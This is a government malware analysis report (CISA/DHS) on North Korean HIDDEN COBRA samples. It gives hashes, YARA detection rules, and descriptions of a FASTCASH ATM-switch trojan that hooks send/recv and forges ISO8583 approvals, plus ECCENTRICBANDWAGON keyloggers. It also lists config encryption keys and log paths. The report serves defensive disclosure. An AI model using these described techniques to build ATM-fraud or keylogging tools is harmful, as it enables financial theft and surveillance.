Analysis indicates the Send API is hooked with a function that uses the “getpeername” IP address of the connected host. The IP address of the host is converted using “ntohs” and if it matches one of the values “16843029” or “33620245” the sent traffic will be logged in a file named “c:\tmp\_DMP\TMPL_%d_%d.tmp”. The format of the sent data logged is SEND SOCK= 0x%p, BUF= 0x%p, LEN= 0x%08X, RET= %08X, IP= %s, Port= (Figure 7). Static analysis indicates successful hooks made to the “Send” and “Recv” APIs within the target process will be logged in a file named “c:\tmp\_DMP\TMPL_%d_%d.tmp” with the format “g_hook_flag = %d”.

Screenshots

Figure 1 - Cipher used when decoding data in "info.dat".

Figure 1 – Cipher used when decoding data in “info.dat”.

Figure 2 - API "Recv" hook checking for incoming Financial Request Message for a targeted PAN.

Figure 2 – API “Recv” hook checking for incoming Financial Request Message for a targeted PAN.

Figure 3 - The malware searching for targeted PANs.

Figure 3 – The malware searching for targeted PANs.

Figure 4 - Malware crafting and sending responses to the ATM.

Figure 4 – Malware crafting and sending responses to the ATM.

Figure 5 - Hook function either searching network traffic for Financial Message or logging it and sending to the "RECV" API.

Figure 5 – Hook function either searching network traffic for Financial Message or logging it and sending to the “RECV” API.

Figure 6 - "RECV" Hook API function checking if the connected host is one of the two IP addresses.

Figure 6 – “RECV” Hook API function checking if the connected host is one of the two IP addresses.

Figure 7 - Logging outbound traffic to the two specific IP addresses.

Figure 7 – Logging outbound traffic to the two specific IP addresses.

39cbad3b2aac6298537a85f0463453d54ab2660c913f4f35ba98fffeb0b15655

Tags

HIDDEN-COBRAtrojan

Details
Name switch.exe
Size 67448 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 89081f2e14e9266de8c042629b764926
SHA1 730c1b9e950932736fc4b02cbdb4e4e891485ac2
SHA256 39cbad3b2aac6298537a85f0463453d54ab2660c913f4f35ba98fffeb0b15655
SHA512 bbb5aa4d8e7a011daff71774ee9c74fa4d14627de1c25e0437c879bd1cd137223d5c2fb20fd101a511a95e59d91ea884b0947229ee67e40a4a24350573fb9e54
ssdeep 768:aQ1PWoWzXyjJsTKJUniYs1pdLn4nDT622YuYDIhscWTJqLPNofEDy9nAXmIEHbKa:aQ5WDziX+nD0LWT6FYZDgs5ULPIJEYp
Entropy 6.396614
Antivirus
Ahnlab HackTool/Win32.Injector
Antiy Trojan[Banker]/Win32.Alreay
ClamAV Win.Trojan.Alreay-7189192-0
Comodo Malware
ESET a variant of Generik.CWSORYC trojan
Emsisoft Gen:Variant.Ursu.634943 (B)
Ikarus Trojan.Inject
K7 Riskware ( 0040eff71 )
McAfee Trojan-Banking
Microsoft Security Essentials Trojan:Win32/LazInjector.DD!MSR
NANOAV Trojan.Win32.Alreay.geqrko
Sophos Troj/Banker-GYS
Symantec Trojan Horse
TrendMicro TROJ_NO.4FADD924
TrendMicro House Call TROJ_NO.4FADD924
VirusBlokAda TrojanBanker.Alreay
Zillya! Trojan.Alreay.Win32.96
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-06-13 02:17:06-04:00
Import Hash c9febdea3218b92a46f739082f26471e
PE Sections
MD5 Name Raw Size Entropy
cde81f1500263860f325ee8f80c483ce header 1024 2.497464
a8c0a36524287fef367821e833a68350 .text 38912 6.518662
e1c66ff8e5f0e1909e2691360c974420 .rdata 10752 4.878020
22783e6c2539d6828f3d42b030ca08e9 .data 4096 2.117927
81195ca9b22c050f79e44175e9e7150e .rsrc 512 5.105006
36571bcb45b1ae18dfcf7edc8c5c3d4a .reloc 3584 4.791228
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file is a malicious 32-bit Windows executable. It is a command-line utility. Static analysis indicates its primary purpose is to allow a user to inject a DLL into a remote process.

5cb7a352535b447609849e20aec18c84d8b58e377d9c6365eafb45cdb7ef949b

Tags

HIDDEN-COBRAtrojan

Details
Name A2B1A45A242CEE03FAB0BEDB2E460587
Size 130560 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 a2b1a45a242cee03fab0bedb2e460587
SHA1 e9c9ef312370d995d303e8fc60de4e4765436f58
SHA256 5cb7a352535b447609849e20aec18c84d8b58e377d9c6365eafb45cdb7ef949b
SHA512 4ced785089832287d634c77c2b5fb16efb2147b75da9014320c98d1bc0933504bfba77273576c35b97548d25acb88a0f2944cbef6a78509f945a8502f8910da8
ssdeep 3072:j5KO2SQhF+VJbGHMjjNNyCkeZjDYJklGCx:oO2SQT+nGHADyAZjJwC
Entropy 6.431962
Antivirus
VirusBlokAda BScope.TrojanBanker.Agent
YARA Rules
  • rule CISA_3P_10257062 : HiddenCobra FASTCASH trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10257062”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Trojan”
           Family = “FASTCASH”
           Description = “Detects HiddenCobra FASTCASH samples”
           MD5_1 = “a2b1a45a242cee03fab0bedb2e460587”
           SHA256_1 = “5cb7a352535b447609849e20aec18c84d8b58e377d9c6365eafb45cdb7ef949b”
       strings:
           $sn_config_key1 = “Slsklqc^mNgq`lyznqr[q^123”
           $sn_config_key2 = “zRuaDglxjec^tDttSlsklqc^m”
           $sn_logfile1 = “C:\intel\_DMP_V\spvmdl.dat”
           $sn_logfile2 = “C:\intel\_DMP_V\spvmlog_%X.dat”
           $sn_logfile3 = “C:\intel\_DMP_V\TMPL_%X.dat”
           $sn_logfile4 = “C:\intel\mvblk.dat”
           $sn_logfile5 = “C:\intel\_DMP_V\spvmsuc.dat”
       condition:
           all of ($sn*)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-07-03 08:11:16-04:00
Import Hash 76e8a4f811b021cf503340a0077515cc
PE Sections
MD5 Name Raw Size Entropy
cbe7e7fdab96c22785fa8d7c03ca6b2b header 1024 2.429436
03d36f4d9ae3e002027c981c399ab8c6 .text 89600 6.630313
d1f983704c508544b315d577fe3563e1 .rdata 23040 5.215776
a4b79dca294053725e2b2091453d9d85 .data 8192 4.358771
d762ef71411860ae50212e14c0a5ba72 .rsrc 512 5.115767
2e4eb6056385f6f721d970cafe65bebe .reloc 8192 4.774185
Packers/Compilers/Cryptors
Microsoft Visual C++ DLL *sign by CodeRipper
Description

The file uses a configuration file, a black-list, and a series of log files:

–Begin files–
C:intelmyconf.ini: Configuration file that contains account numbers (encrypted) C:intelmyblk.dat: Black-listed account numbers (encrypted) C:intel_DMP_Vspvmlog_<PID>.dat: Logs general messages and errors.
Entry Format: [<YYYY-MM-DD HH:MM:SS.sss>][PID:<PID>][TID:<TID>] <Message>”]
C:intel_DMP_Vspvmdl.dat: Logs API hooking/unhooking success and failure.
Entry Format:
Hook Success Entry: ‘Windows’
Hook Error Entry: ‘Linux’
UnHook Success Entry: ‘Acer’
UnHook Error Entry: ‘Lenovo’
C:intel_DMP_VTMPL<PID>.dat: Logs Send/Receive Message metadata
Entry Format:
Recv Entry: ‘recv – SOCK=<socket_id>, Addr=<IP>, Port=<Port>, pBuf=<data>, size=<datasize>’ Send Entry: ‘send – SOCK=<socket_id>, Addr=<IP>, Port=<Port>, size=<datasize>’ C:intel_DMP_VTMPR<PID>.tmp: Logs Received Messages
C:intel_DMP_VTMPS<PID>.tmp: Logs Sent Messages
C:intel_DMP_VTMPHSMS<PID>.tmp: Logs LocalHost ARQC sent messages C:intel_DMP_VTMPHSMR<PID>.tmp: Logs LocalHost ARQC received messages
C:intel_DMP_Vspvmscap.dat: Logs modified sent messages
C:intel_DMP_Vspvmsuc.dat: Logs modified sent messages metadata (encrypted)
–End files–

Upon attaching to a process, the sample will decrypt the encrypted config from the configuration file and read it into memory. Next, it will hook the processes send and recv winAPIs. When the “send” function is called, it will check to see if the port is 7029, if so, it will log the data and metadata in the above log files, if not it will just pass through calling send as the program normally would. When the “receive” function is called, it will check to see if the port is 7029, if so, it will wait for packets received from port 7029 and parse the following ISO8583 fields out of the incoming datagram:

–Begin fields–
MESSAGE_TYPE_INDICATOR (MTI)
PRIMARY_ACCOUNT_NUMBER (PAN)
PROCESSING_CODE
RESERVED_NATIONAL_3
–End fields–

Next, it checks the loaded configuration for the PAN. If it exists, it will continue processing, otherwise it will pass. Then it will check the blacklist file for the PAN. If blacklist contains ‘all’ or the PAN, will set the RESPONSE_CODE to 51 (Insufficient funds) in the response message. It looks for the following message types:

–Begin message types–
POS system message
ATM transaction request
ATM balance inquiry
–End message types–

Next it, constructs what appears to be an Authorization Request Cryptogram (ARQC) message:

–Begin format–
Uses the PRIMARY_ACCOUNT_NUMBER and ICC_DATA
Contains the hardcoded string: “U8BFE0AE12F9000C1480B297BE43CAC97”
Sends to localhost on port 9990
Parses the response Authorization Response Cryptogram (ARPC) message
–End format–

Finally, it constructs and sends a ISO8583 response message.

When detaching from the process, the sample unhooks the “send” and “recv” WINAPI functions, returning them to their normal state. It will then overwrite the first 0x400 bytes of the in-memory DLL from the process, effectively cleaning up any trace of the sample.

The sample frequently uses code that is taken from GitHub with a few modifications in some cases. The sample uses code that is taken from github.com/petewarden/c_hashmap to load the configuration file into memory in a hashmap, API hooking using Microsoft’s Detour library at github.com/Microsoft/Detours and the ISO8583 parsing code is taken from github.com/sabit/Oscar-ISO8583 (slightly modified to facilitate parsing of IBM037 formatted data).

The encryption that is used for all log/config files is likely an AES variant with the following keys:

–Begin keys–
zRuaDglxjec^tDtt
Slsklqc^mNgq`lyz
–End keys–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • August 26, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 26, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, DHS, FBI, and DoD identified Remote Access Tool (RAT) malware variants used by the North Korean government. This malware variant has been identified as ECCENTRICBANDWAGON. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. DHS, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This report looks at malware samples known as ECCENTRICBANDWAGON. This family of malware is used as a reconnaissance tool. The samples in this report are used for keylogging and screen capture functionality. The samples are very similar, but differ slightly in the location that they store the key logs and screenshots. Some variants have RC4 encrypted strings within the executable and conduct a simple, ineffective cleanup, whereas others do not.

For a downloadable copy of IOCs, see [STIX file].

Submitted Files (4)

32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8 (PSLogger .dll)

9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e (PSLogger .dll)

c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec (PSLogger .dll)

efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e (PSLogger .dll)

Findings

efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e

Tags

HIDDEN-COBRAbackdoorkeyloggerreconnaissancescreen-capturespywaretrojan

Details
Name PSLogger .dll
Size 138240 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 d45931632ed9e11476325189ccb6b530
SHA1 081d5bd155916f8a7236c1ea2148513c0c2c9a33
SHA256 efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e
SHA512 fd1b7ea95f66a660e9183c22755ac7d741823ba45a009bf9929546213308f89fd9ce8fcc2e70b56e427f0daa1b0965817d45dd9c2f5598404bc79c50afc2f818
ssdeep 3072:t+N02CVLOJdCPQhVNRTzcb/YrgHdnG6ioaa5IR:sO2qO3CPkRTz8YrgHdGBoa1
Entropy 6.096739
Antivirus
Ahnlab Trojan/Win64.Agent
Antiy Trojan[Spy]/Win64.Agent
Avira TR/Spy.Agent.ftmjo
BitDefender Trojan.GenericKD.40337042
Cyren W64/Trojan.WFEO-4014
ESET a variant of Win64/Spy.Agent.AP trojan
Emsisoft Trojan.GenericKD.40337042 (B)
Filseclab W64.Spy.Agent.AP.feaw
Ikarus Trojan-Spy.Win64.Agent
K7 Spyware ( 00538f7c1 )
Lavasoft Trojan.GenericKD.40337042
McAfee RDN/Generic PWS.nq
Microsoft Security Essentials Trojan:Win32/Tiggre!plock
NANOAV Trojan.Win64.Mlw.fgbvfi
NetGate Trojan.Win32.Malware
Sophos Troj/Spy-AUK
Symantec Trojan.Crobaruko
Systweak malware.agent
TrendMicro TSPY64_.F7315F7E
TrendMicro House Call TSPY64_.F7315F7E
Vir.IT eXplorer Backdoor.Win32.Lazarus.BGM
VirusBlokAda TrojanSpy.Win64.Agent
Zillya! Trojan.Agent.Win64.2215
YARA Rules
  • rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r1.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan”
           Family = “ECCENTRICBANDWAGON”
           Description = “Detects strings in ECCENTRICBANDWAGON proxy tool”
           MD5_1 = “d45931632ed9e11476325189ccb6b530”
           SHA256_1 = “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e”
           MD5_2 = “acd15f4393e96fe5eb920727dc083aed”
           SHA256_2 = “32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8”
           MD5_3 = “34404a3fb9804977c6ab86cb991fb130”
           SHA256_3 = “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec”
           MD5_4 = “3122b0130f5135b6f76fca99609d5cbe”
           SHA256_4 = “9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e”
       strings:
           $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
           $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
           $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
           $sn4 = “%s\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d” wide ascii nocase
           $sn5 = “c:\windows\temp\TMP0389A.tmp” wide ascii nocase
       condition:
           any of them
    }
ssdeep Matches
100 32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8
PE Metadata
Compile Date 2018-04-27 22:53:06-04:00
Import Hash f0faa229b086ea5053b4268855f0c8ba
PE Sections
MD5 Name Raw Size Entropy
09745305cbad67b17346f0f6dba1e700 header 1024 2.729080
5c2242b56a31d64b6ce82671d97a82a4 .text 92160 6.415763
0d022eff24bc601d97d2088b4179bd18 .rdata 31232 4.934652
578e5078ccb878f1aa9e309b4cfc2be5 .data 6144 2.115729
09924946b47ef078f7e9af4f4fcb59dc .pdata 5632 4.803615
7ead0113095bc6cb3b2d82f05fda25f3 .rsrc 512 5.115767
7937397e0a31cdc87f5b79074825e18e .reloc 1536 2.931043
Description

This file is a 64-bit dynamic link library (DLL). This malware uses 3 files that will be used to store the key logs, screen shots, and log intervals. The location of these logs can be found in C:windowstempTMP0389A.tmp.

–Begin Log Files–
1. Keylog: %temp%GoogleChromechromeupdate_pk
2. Screenshots: %temp%GoogleChromechromeupdate_ps_<YYYMMDD>_<HHMMSS>_<sss>_<ThreadID>
3. Log intervals: C:ProgramData2.dat
–End Log Files–

The malware creates 3 threads to populate the log files listed above. Each one will continue to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads will return and the program will exit.

32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8

Tags

HIDDEN-COBRAbackdoorkeyloggerreconnaissancescreen-capturespywaretrojan

Details
Name PSLogger .dll
Size 138243 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 acd15f4393e96fe5eb920727dc083aed
SHA1 c92529097cad8996f3a3c8eb34b56273c29bdce5
SHA256 32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8
SHA512 82a946c2d0c9fffdd23d8e6b34028ac1b0368d4fd78302268aa4d954bead8a82ea15873a28d69946dceaf80fcafd0c52aeb59f47df5a029f77072fa1bc8e0fae
ssdeep 3072:t+N02CVLOJdCPQhVNRTzcb/YrgHdnG6ioaa5IR:sO2qO3CPkRTz8YrgHdGBoa1
Entropy 6.096652
Antivirus
Ahnlab Trojan/Win64.Agent
Antiy Trojan[Spy]/Win64.Agent
Avira TR/Spy.Agent.ftmjo
BitDefender Trojan.GenericKD.40337042
Comodo Malware
Cyren W64/Trojan.WFEO-4014
ESET a variant of Win64/Spy.Agent.AP trojan
Emsisoft Trojan.GenericKD.40337042 (B)
Ikarus Trojan-Spy.Win64.Agent
K7 Spyware ( 00538f7c1 )
Lavasoft Trojan.GenericKD.40337042
Microsoft Security Essentials Trojan:Win32/Tiggre!plock
NANOAV Trojan.Win64.Mlw.fgbtfv
Symantec Trojan.Crobaruko
Systweak malware.agent
Vir.IT eXplorer Backdoor.Win32.Lazarus.BGM
VirusBlokAda TrojanSpy.Win64.Agent
Zillya! Trojan.Agent.Win64.2215
YARA Rules
  • rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r1.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan”
           Family = “ECCENTRICBANDWAGON”
           Description = “Detects strings in ECCENTRICBANDWAGON proxy tool”
           MD5_1 = “d45931632ed9e11476325189ccb6b530”
           SHA256_1 = “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e”
           MD5_2 = “acd15f4393e96fe5eb920727dc083aed”
           SHA256_2 = “32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8”
           MD5_3 = “34404a3fb9804977c6ab86cb991fb130”
           SHA256_3 = “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec”
           MD5_4 = “3122b0130f5135b6f76fca99609d5cbe”
           SHA256_4 = “9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e”
       strings:
           $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
           $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
           $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
           $sn4 = “%s\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d” wide ascii nocase
           $sn5 = “c:\windows\temp\TMP0389A.tmp” wide ascii nocase
       condition:
           any of them
    }
ssdeep Matches
100 efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e
PE Metadata
Compile Date 2018-04-27 22:53:06-04:00
Import Hash f0faa229b086ea5053b4268855f0c8ba
PE Sections
MD5 Name Raw Size Entropy
09745305cbad67b17346f0f6dba1e700 header 1024 2.729080
5c2242b56a31d64b6ce82671d97a82a4 .text 92160 6.415763
0d022eff24bc601d97d2088b4179bd18 .rdata 31232 4.934652
578e5078ccb878f1aa9e309b4cfc2be5 .data 6144 2.115729
09924946b47ef078f7e9af4f4fcb59dc .pdata 5632 4.803615
7ead0113095bc6cb3b2d82f05fda25f3 .rsrc 512 5.115767
7937397e0a31cdc87f5b79074825e18e .reloc 1536 2.931043
Description

This file is a 64-bit DLL. This sample and “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e” are nearly identical with the only difference being that this sample has 3 extra NULL bytes at the end of the file.

This malware uses 3 files that will be used to store the key logs, screen shots, and log intervals. The location of these logs can be found in C:windowstempTMP0389A.tmp.

–Begin Log Files–
1. Keylog: %temp%GoogleChromechromeupdate_pk
2. Screenshots: %temp%GoogleChromechromeupdate_ps_<YYYMMDD>_<HHMMSS>_<sss>_<ThreadID>
3. Log intervals: C:ProgramData2.dat
–End Log Files–

The malware creates 3 threads to populate the log files listed above. Each one will continue to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads will return and the program will exit.

c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec

Tags

HIDDEN-COBRAbackdoorkeyloggerreconnaissancescreen-capturetrojan

Details
Name PSLogger .dll
Size 175104 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 34404a3fb9804977c6ab86cb991fb130
SHA1 b345e6fae155bfaf79c67b38cf488bb17d5be56d
SHA256 c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec
SHA512 01a8c8b66f6895387c6a347d02d00ea09619888f2727096a19d4c4ff50e6bf72367cbd41f09e89a57f7f3862efbb2db8177dbec086c4ce2aca3518d124575033
ssdeep 3072:AeO51bvWZElWhKQGhvNdx2GYZj+utNfBtZl7mGwwZWyNGVxBqu:A77beClWhKQG36UutNfB077Bqu
Entropy 6.491987
Antivirus
Ahnlab Malware/Gen.Generic
Antiy GrayWare/Win32.Presenoker
BitDefender Trojan.GenericKD.43188225
Cyren W32/Trojan.MZDN-2436
ESET a variant of Generik.HKZTFCG trojan
Emsisoft Trojan.GenericKD.43188225 (B)
Ikarus Trojan.SuspectCRC
K7 Trojan ( 005506c81 )
Lavasoft Trojan.GenericKD.43188225
NANOAV Trojan.Win32.KeyLogger.fnwztc
NetGate Malware.Generic
Symantec Hacktool.Keylogger
Vir.IT eXplorer Backdoor.Win32.Lazarus.BGM
VirusBlokAda TrojanSpy.Keylogger
Zillya! Trojan.Keylogger.Win32.9
YARA Rules
  • rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r1.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan”
           Family = “ECCENTRICBANDWAGON”
           Description = “Detects strings in ECCENTRICBANDWAGON proxy tool”
           MD5_1 = “d45931632ed9e11476325189ccb6b530”
           SHA256_1 = “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e”
           MD5_2 = “acd15f4393e96fe5eb920727dc083aed”
           SHA256_2 = “32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8”
           MD5_3 = “34404a3fb9804977c6ab86cb991fb130”
           SHA256_3 = “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec”
           MD5_4 = “3122b0130f5135b6f76fca99609d5cbe”
           SHA256_4 = “9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e”
       strings:
           $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
           $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
           $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
           $sn4 = “%s\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d” wide ascii nocase
           $sn5 = “c:\windows\temp\TMP0389A.tmp” wide ascii nocase
       condition:
           any of them
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-11-14 09:44:18-05:00
Import Hash a8623b2da60776df129ebe0430d48d85
PE Sections
MD5 Name Raw Size Entropy
37ecb293f01edad89fcee1ce48e4cde3 header 1024 2.949326
36fd9d805b7c591ab71eda922662e30a .text 124928 6.650973
1d3132305f18961b86c1fda0a2f4eea9 .rdata 38912 5.166660
9e17ac76df46fd523a11378398cf026f .data 3072 2.367308
bbee55723eaad8c7f73a5fa9bf2159d4 .gfids 512 2.275750
264e317304c9b21a342169b33c0a791a .rsrc 512 4.717679
a1ab3dce319437b49198eeff43f4d847 .reloc 6144 6.422499
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This sample is nearly identical to “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e” with the exception that this sample will RC4 encrypt some of its strings and use different log files.

The following strings are RC4 encrypted with the key “key”:

–Begin RC4 encrypted strings–
Downloads
c:windowstempTMP0389A.tmp
c:windowstemptmp1105.tmp
[CLIPBOARD]
[/CLIPBOARD]
–End RC4 encrypted strings–

This malware uses 3 files that will be used to store the key logs, screen shots, and log intervals. The location of these logs can be found in C:windowstempTMP0389A.tmp.

–Begin log files–
1. Keylog: %temp%Downloadstmp_<USERNAME>
2. Screenshots: %temp%Downloadstmp_<USERNAME>_<MMDD>_<HHMMSS>
3. Log intervals: c:windowstemptmp1105.tmp
–End log files–

The malware creates 3 threads to populate the log files listed above. Each one will continue to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads will return and the program will exit.

9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e

Tags

HIDDEN-COBRAkeyloggerreconnaissancescreen-capturespywaretrojan

Details
Name PSLogger .dll
Size 210944 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 3122b0130f5135b6f76fca99609d5cbe
SHA1 ce6bc34b887d60f6d416a05d5346504c54cff030
SHA256 9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e
SHA512 788c666efeb664c7691a958d15eac2b80d3d17241f5e7c131e5dec2f761bcb70950018c1f8a85fd6600eff0d0fab0ce31fbcd364d16b6ef8b54deb5e9c215f08
ssdeep 3072:6usGRlrmZ8LP/LqdmpWOY9Y9EbyBFWnqD5W3P4Tp31oItN7W0rVu6eRDP/fJkkj7:67GTjOdCWOKXbyCnCEQTp2CE0/gh2W
Entropy 6.246368
Antivirus
Ahnlab Trojan/Win64.Redbanc
Antiy Trojan[Banker]/Win32.Alreay
Avira TR/Spy.Agent.kdvkr
BitDefender Trojan.GenericKD.41368668
ESET a variant of Win64/Spy.Agent.BG trojan
Emsisoft Trojan.GenericKD.41368668 (B)
Ikarus Trojan-Spy.Keylogger.Lazarus
K7 Spyware ( 005501401 )
Lavasoft Trojan.GenericKD.41368668
McAfee RDN/Generic PWS.tf
NANOAV Trojan.Win64.Alreay.hoqvyj
Quick Heal Trojan.Alreay
Sophos Troj/Alreay-A
TACHYON Unknown-Type/Alreay.210944
Zillya! Trojan.Alreay.Win32.91
YARA Rules
